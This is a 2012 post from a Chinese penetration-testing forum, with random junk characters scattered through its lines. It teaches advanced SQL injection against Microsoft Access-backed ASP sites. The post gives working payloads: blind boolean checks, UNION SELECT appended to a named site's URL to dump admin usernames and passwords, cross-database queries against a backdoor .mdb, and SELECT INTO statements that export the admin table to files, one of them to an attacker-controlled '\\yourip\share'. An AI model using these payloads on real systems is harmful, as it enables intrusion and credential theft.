中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]

作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------: p4 h3 [& s% s
union查询法' Y0 I) f1 l6 y' u
首先要说的就是查询办法,一般的查询办法就是) t/ {% q' J4 N0 I  V4 s& i! N

4 ]* {, I$ \- m, f' \! s1 o程序代码% o& O3 l6 {2 s' X0 l
and 1=(select count(*) from admin where left(id,1)='1')4 V- J8 Y3 E4 ~& W$ U

7 D1 v) v% G" V0 n) B8 y. F这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
: C" b: b! }3 J0 f6 Z- b所以这个时候,union select横空出现.别以为只能在PHP里用哦...
. {: R6 S0 r$ {4 N: n譬如你有一个ACCESS点:
& {3 S6 n3 p7 q. f8 A程序代码. d( y& Q) j8 t
http://bbs.tian6.com/xiaoyang.asp?coder=1
+ E9 N' V7 P6 E" w
4 A! ]: ?9 N5 c知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
2 F' u5 j2 u6 t: G' Z% c$ D然后我们直接来:
* n6 L% g, V$ a8 N5 E5 ]# d' u程序代码
* {  y1 q- v' {# }: p* w6 mhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]" p' \! t& q! B* e) f4 C
; V& N% {7 S* Z2 u# J( T- i
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.& g. l3 }! @# p) i4 q6 z8 W
. p" b$ {- `+ {, Y2 u
( E! T1 F2 e6 P, _9 n) }0 h
/ o0 Z3 {) k$ {9 \' p0 W$ [; s5 V
---------------------------------------------------------------4 e5 k# @0 C/ u# E3 v* D' X6 X* m+ y
Access跨库查询1 U( W" X2 L$ s
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.* J/ v+ X2 V$ h1 V6 I
跨库的查询语句:
; c# A9 w8 @  }* N子查询:
! Z7 E( |$ C0 P( F6 t程序代码1 d  ?; M7 U3 J6 Y, L! D% L
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0, H1 W$ h9 l0 O& G7 y/ B

1 x- C4 X' g: D+ xunion查询:  O9 ?5 g" P' @& Q/ ^$ Z
程序代码
9 V! O& E3 |# L/ {, o) Vunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1$ t5 G( I; ?- w! @& k
# q/ B7 C. I% i9 O5 u$ t% ?
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:8 k& k/ i! N( ]' U$ s0 j/ u/ A
程序代码
1 n5 i# S5 H6 Y( Shttp://www.4ngel.net/article/46.htm
; n* v3 T, J  B  Chttp://hf110.com/Article/hack/rqsl/200502/66.html  X; c0 W: V2 M! s) V; F
1 E# I3 o1 n2 P* l7 h7 X; k- |
---------------------------------------------------------------; ]1 u* m/ V0 X, W8 k- M0 c# N
Access注入,导出txt,htm,html# \+ o; Q: l  e$ Y
子查询语句:
" l' j6 F- b$ R程序代码9 m5 P# O" f3 p: m- L
Select * into [test.txt] in 'd:\web\' 'text;' from admin
4 ^- R9 R. D. h+ K: v* K3 m& Z9 J: A5 I" n- v
这样就把admin表的内容以test类型存进了d:\web里面.4 W) C# N% r7 i& j
UNION查询:, R$ w% B" D) W2 L+ R1 o
程序代码5 \2 i- v! V/ n: q7 o
union select * into [admin.txt] in 'c:\' 'test;' from admin, j7 o  N+ H  Y  H* y9 U  O! C3 k
# u/ S9 m8 [4 c2 B' x0 `4 Y; t4 [' U
而且这里也可以保存到本地来:/ @3 A3 V5 ^2 G' y2 G' v. c
程序代码
3 T, l. K" L' L$ Y3 E1 bSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
4 a1 c6 `2 O& T+ c3 D; T
' i& f3 e9 O% c, G+ W不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
  U. A7 N. E3 w9 U+ X/ c9 @. }/ ^5 x) Q: O2 D4 I
程序代码+ y' h( K8 X0 A- q- z6 s9 N, I7 `
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
" |  v* U  c2 t  ~  U" u" ]0 E1 ?7 n$ {) y; o: y
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.
! X! }  z$ Y2 A: e0 [% v




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2